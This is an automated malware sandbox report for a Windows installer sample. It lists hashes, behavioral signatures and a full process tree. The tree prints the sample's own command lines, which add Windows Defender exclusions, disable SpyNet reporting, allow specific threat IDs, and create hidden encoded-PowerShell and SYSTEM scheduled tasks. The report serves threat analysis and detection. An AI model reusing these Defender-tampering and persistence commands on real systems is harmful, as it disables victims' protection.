Analysis
  max time kernel: 96s
  max time network: 110s
  platform: windows10-2004_x64
  resource: win10v2004-20230221-en
  resource tags: arch:x64, arch:x86, image:win10v2004-20230221-en, locale:en-us, os:windows10-2004-x64, system
  submitted: 19/04/2023, 18:34

Static task: static1
Behavioral task: behavioral1
  Sample: file.exe
  Resource: win7-20230220-en
General
  Target: file.exe
  Size: 7.2MB
  MD5: 9b2f88d0b9d260fdfbf606f19577308e
  SHA1: d90da845541355034efc4480a5d97a211a03a745
  SHA256: 2e56d01448b731adb1b35fc72228af0efa4f10c254e03d914113702e6b2bdfd5
  SHA512: bab68e67dfd309b94d744bcdb21968fb1810b942ab5cc131a1a61a3f6fd99e357cc28d17dc878ec6d9b57ae4b53708c40ac7e08c2a73393bc069609190eabe9b
  SSDEEP: 196608:91OLashz3FJ5/UI3hOxCHG7qn3+CYierPRURuWkcyvFYP:3OJhzVJNb393+5i8ZURuWPy+
Malware Config
Signatures
Blocklisted process makes network request (1 IoC)
  flow | pid | Process
  65 | 320 | rundll32.exe

Checks BIOS information in registry (2 TTPs, 2 IoCs)
  BIOS information is often read in order to detect sandboxing environments.
  description | ioc | Process
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | rundll32.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | Install.exe

Checks computer location settings (2 TTPs, 2 IoCs)
  Looks up country code configured in the registry, likely geofence.
  description | ioc | Process
  Key value queried | \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation | Install.exe
  Key value queried | \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation | whfErpC.exe

Executes dropped EXE (4 IoCs)
  pid | Process
  4284 | Install.exe
  4104 | Install.exe
  3240 | SxsvKTq.exe
  2680 | whfErpC.exe

Loads dropped DLL (1 IoC)
  pid | Process
  320 | rundll32.exe

Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc.

Checks installed software on the system (1 TTP)
  Looks up Uninstall key entries in the registry to enumerate software on the system.

Drops Chrome extension (1 IoC)
  description | ioc | Process
  File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json | whfErpC.exe

Drops desktop.ini file(s) (1 IoC)
  description | ioc | Process
  File opened for modification | C:\$RECYCLE.BIN\S-1-5-18\desktop.ini | whfErpC.exe

Drops file in System32 directory (27 IoCs)
  description | ioc | Process
  File opened for modification | C:\Windows\system32\GroupPolicy\gpt.ini | SxsvKTq.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies | whfErpC.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA | whfErpC.exe
  File created | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | SxsvKTq.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_91DF16218BAC821A4575D2F721820BAA | whfErpC.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2DDCD2B5F37625B82E81F4976CEE400_A64929E2A42F7C92FC67B1EBAC2A88F1 | whfErpC.exe
  File created | C:\Windows\system32\GroupPolicy\gpt.ini | Install.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 | whfErpC.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache | whfErpC.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content | whfErpC.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.exe
  File opened for modification | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | whfErpC.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_91DF16218BAC821A4575D2F721820BAA | whfErpC.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData | whfErpC.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA | whfErpC.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 | whfErpC.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE | whfErpC.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 | whfErpC.exe
  File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft | whfErpC.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\5038C0447BCAF9C6EE7F2D13E3E0DDAD | whfErpC.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\5038C0447BCAF9C6EE7F2D13E3E0DDAD | whfErpC.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA | whfErpC.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA | whfErpC.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2DDCD2B5F37625B82E81F4976CEE400_A64929E2A42F7C92FC67B1EBAC2A88F1 | whfErpC.exe
  File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log | powershell.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 | whfErpC.exe

Drops file in Program Files directory (14 IoCs)
  description | ioc | Process
  File created | C:\Program Files\Mozilla Firefox\browser\omni.ja.bak | whfErpC.exe
  File created | C:\Program Files (x86)\uzjGIbOFKwqU2\hbyZlFVMBBzxN.dll | whfErpC.exe
  File created | C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi | whfErpC.exe
  File created | C:\Program Files (x86)\xbGBeBqdnfmWSnEyoVR\vrGRRZO.dll | whfErpC.exe
  File created | C:\Program Files (x86)\HqWclUkqRTUn\QJddwPy.dll | whfErpC.exe
  File opened for modification | C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi | whfErpC.exe
  File opened for modification | C:\Program Files\Mozilla Firefox\browser\omni.ja.bak | whfErpC.exe
  File opened for modification | C:\Program Files\Mozilla Firefox\browser\omni.ja | whfErpC.exe
  File created | C:\Program Files (x86)\PSrMLwgNU\hGHxdwB.xml | whfErpC.exe
  File created | C:\Program Files (x86)\uzjGIbOFKwqU2\dXeoxoh.xml | whfErpC.exe
  File created | C:\Program Files (x86)\MySKhCIAjPpVC\xiMNyWU.xml | whfErpC.exe
  File created | C:\Program Files (x86)\PSrMLwgNU\bZFMBx.dll | whfErpC.exe
  File created | C:\Program Files (x86)\xbGBeBqdnfmWSnEyoVR\HBfgzWt.xml | whfErpC.exe
  File created | C:\Program Files (x86)\MySKhCIAjPpVC\BUCVulx.dll | whfErpC.exe

Drops file in Windows directory (4 IoCs)
  description | ioc | Process
  File created | C:\Windows\Tasks\bXdYnizyUUWLarOGTm.job | schtasks.exe
  File created | C:\Windows\Tasks\pBhpQhEndrCBLmKcV.job | schtasks.exe
  File created | C:\Windows\Tasks\KlOugEwrPWYFNkY.job | schtasks.exe
  File created | C:\Windows\Tasks\oIOmecagrUeRFYAlI.job | schtasks.exe

Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). The sandbox attaches the note "likely ransomware behaviour" to this signature generically; nothing else in this report (no encryption of user files, no ransom note) supports that, and the remaining signatures describe a browser-tampering installer (Chrome extension drop, Firefox omni.ja modification, Defender policy changes, scheduled tasks).

Creates scheduled task(s) (1 TTP, 11 IoCs)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
  pid | Process
  4368 | schtasks.exe
  3796 | schtasks.exe
  4820 | schtasks.exe
  1428 | schtasks.exe
  3256 | schtasks.exe
  3788 | schtasks.exe
  5044 | schtasks.exe
  5052 | schtasks.exe
  824 | schtasks.exe
  3044 | schtasks.exe
  4668 | schtasks.exe

Enumerates system info in registry (2 TTPs, 4 IoCs)
  description | ioc | Process
  Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | Install.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | Install.exe
  Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | rundll32.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | rundll32.exe

Modifies data under HKEY_USERS (64 IoCs)
  description | ioc | Process
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | powershell.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | whfErpC.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | powershell.exe
  Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix | whfErpC.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume | whfErpC.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{7e74cb8c-0000-0000-0000-d01200000000} | whfErpC.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{7e74cb8c-0000-0000-0000-d01200000000}\MaxCapacity = "15140" | whfErpC.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{7e74cb8c-0000-0000-0000-d01200000000}\NukeOnDelete = "0" | whfErpC.exe
  Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" | whfErpC.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | powershell.exe
  Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" | whfErpC.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | powershell.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | whfErpC.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | whfErpC.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | whfErpC.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.exe
  Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix | rundll32.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.exe

Suspicious behavior: EnumeratesProcesses (44 IoCs; identical rows collapsed, the last column is the repeat count)
  pid | Process | events
  760 | powershell.EXE | 2
  4908 | powershell.exe | 2
  4156 | powershell.exe | 2
  4664 | powershell.EXE | 2
  2680 | whfErpC.exe | 36

Suspicious use of AdjustPrivilegeToken (4 IoCs)
  description | pid | Process
  Token: SeDebugPrivilege | 760 | powershell.EXE
  Token: SeDebugPrivilege | 4908 | powershell.exe
  Token: SeDebugPrivilege | 4156 | powershell.exe
  Token: SeDebugPrivilege | 4664 | powershell.EXE

Suspicious use of WriteProcessMemory (64 IoCs; identical rows collapsed, the last column is the repeat count)
  description | pid | Process | procid_target | events
  PID 4536 wrote to memory of 4284 | 4536 | file.exe | 82 | 3
  PID 4284 wrote to memory of 4104 | 4284 | Install.exe | 83 | 3
  PID 4104 wrote to memory of 4220 | 4104 | Install.exe | 84 | 3
  PID 4104 wrote to memory of 3228 | 4104 | Install.exe | 86 | 3
  PID 4220 wrote to memory of 2224 | 4220 | forfiles.exe | 88 | 3
  PID 2224 wrote to memory of 1876 | 2224 | cmd.exe | 89 | 3
  PID 3228 wrote to memory of 728 | 3228 | forfiles.exe | 90 | 3
  PID 2224 wrote to memory of 1164 | 2224 | cmd.exe | 91 | 3
  PID 728 wrote to memory of 4184 | 728 | cmd.exe | 92 | 3
  PID 728 wrote to memory of 1912 | 728 | cmd.exe | 93 | 3
  PID 4104 wrote to memory of 4368 | 4104 | Install.exe | 97 | 3
  PID 4104 wrote to memory of 2880 | 4104 | Install.exe | 99 | 3
  PID 760 wrote to memory of 1000 | 760 | powershell.EXE | 104 | 2
  PID 4104 wrote to memory of 4132 | 4104 | Install.exe | 112 | 3
  PID 4104 wrote to memory of 5044 | 4104 | Install.exe | 114 | 3
  PID 3240 wrote to memory of 4908 | 3240 | SxsvKTq.exe | 117 | 3
  PID 4908 wrote to memory of 740 | 4908 | powershell.exe | 119 | 3
  PID 740 wrote to memory of 4920 | 740 | cmd.exe | 120 | 3
  PID 4908 wrote to memory of 3704 | 4908 | powershell.exe | 121 | 3
  PID 4908 wrote to memory of 3804 | 4908 | powershell.exe | 122 | 3
  PID 4908 wrote to memory of 1828 | 4908 | powershell.exe | 123 | 3
  PID 4908 wrote to memory of 2100 | 4908 | powershell.exe | 124 | 2

Processes
(indentation shows parent/child depth; the "&REG" fragments that the page rendered as "®" are restored)

C:\Users\Admin\AppData\Local\Temp\file.exe
  cmdline: "C:\Users\Admin\AppData\Local\Temp\file.exe"
  PID: 4536
  - Suspicious use of WriteProcessMemory

    C:\Users\Admin\AppData\Local\Temp\7zS6B9F.tmp\Install.exe
      cmdline: .\Install.exe
      PID: 4284
      - Executes dropped EXE
      - Suspicious use of WriteProcessMemory

        C:\Users\Admin\AppData\Local\Temp\7zS87B3.tmp\Install.exe
          cmdline: .\Install.exe /S /site_id "525403"
          PID: 4104
          - Checks BIOS information in registry
          - Checks computer location settings
          - Executes dropped EXE
          - Drops file in System32 directory
          - Enumerates system info in registry
          - Suspicious use of WriteProcessMemory

            C:\Windows\SysWOW64\forfiles.exe
              cmdline: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
              PID: 4220
              - Suspicious use of WriteProcessMemory

                C:\Windows\SysWOW64\cmd.exe
                  cmdline: /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
                  PID: 2224
                  - Suspicious use of WriteProcessMemory

                    \??\c:\windows\SysWOW64\reg.exe
                      cmdline: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
                      PID: 1876

                    \??\c:\windows\SysWOW64\reg.exe
                      cmdline: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                      PID: 1164

            C:\Windows\SysWOW64\forfiles.exe
              cmdline: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
              PID: 3228
              - Suspicious use of WriteProcessMemory

                C:\Windows\SysWOW64\cmd.exe
                  cmdline: /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                  PID: 728
                  - Suspicious use of WriteProcessMemory

                    \??\c:\windows\SysWOW64\reg.exe
                      cmdline: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                      PID: 4184

                    \??\c:\windows\SysWOW64\reg.exe
                      cmdline: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                      PID: 1912

            C:\Windows\SysWOW64\schtasks.exe
              cmdline: schtasks /CREATE /TN "ggDWiCsTD" /SC once /ST 07:42:30 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
              (the -EncodedCommand argument is UTF-16LE base64 and decodes to: start-process -WindowStyle Hidden gpupdate.exe /force)
              PID: 4368
              - Creates scheduled task(s)

            C:\Windows\SysWOW64\schtasks.exe
              cmdline: schtasks /run /I /tn "ggDWiCsTD"
              PID: 2880

            C:\Windows\SysWOW64\schtasks.exe
              cmdline: schtasks /DELETE /F /TN "ggDWiCsTD"
              PID: 4132

            C:\Windows\SysWOW64\schtasks.exe
              cmdline: schtasks /CREATE /TN "bXdYnizyUUWLarOGTm" /SC once /ST 20:35:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\scRiQJwYnZurGYzcC\ZrLmggqzYyKemQH\SxsvKTq.exe\" en /site_id 525403 /S" /V1 /F
              PID: 5044
              - Drops file in Windows directory
              - Creates scheduled task(s)

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  (same encoded command as the ggDWiCsTD task: start-process -WindowStyle Hidden gpupdate.exe /force)
  PID: 760
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory

    C:\Windows\system32\gpupdate.exe
      cmdline: "C:\Windows\system32\gpupdate.exe" /force
      PID: 1000

C:\Windows\system32\svchost.exe
  cmdline: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
  PID: 4984

C:\Windows\system32\svchost.exe
  cmdline: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
  PID: 3344

C:\Windows\system32\gpscript.exe
  cmdline: gpscript.exe /RefreshSystemParam
  PID: 2268

C:\Users\Admin\AppData\Local\Temp\scRiQJwYnZurGYzcC\ZrLmggqzYyKemQH\SxsvKTq.exe
  cmdline: C:\Users\Admin\AppData\Local\Temp\scRiQJwYnZurGYzcC\ZrLmggqzYyKemQH\SxsvKTq.exe en /site_id 525403 /S
  PID: 3240
  - Executes dropped EXE
  - Drops file in System32 directory
  - Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      cmdline (one command line, wrapped here with one REG ADD statement per line):
        powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;
        REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;
        REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;
        REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;
        REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;
        REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;
        REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;
        REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;
        REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;
        REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;
        REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;
        REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;
        REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;
        REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;
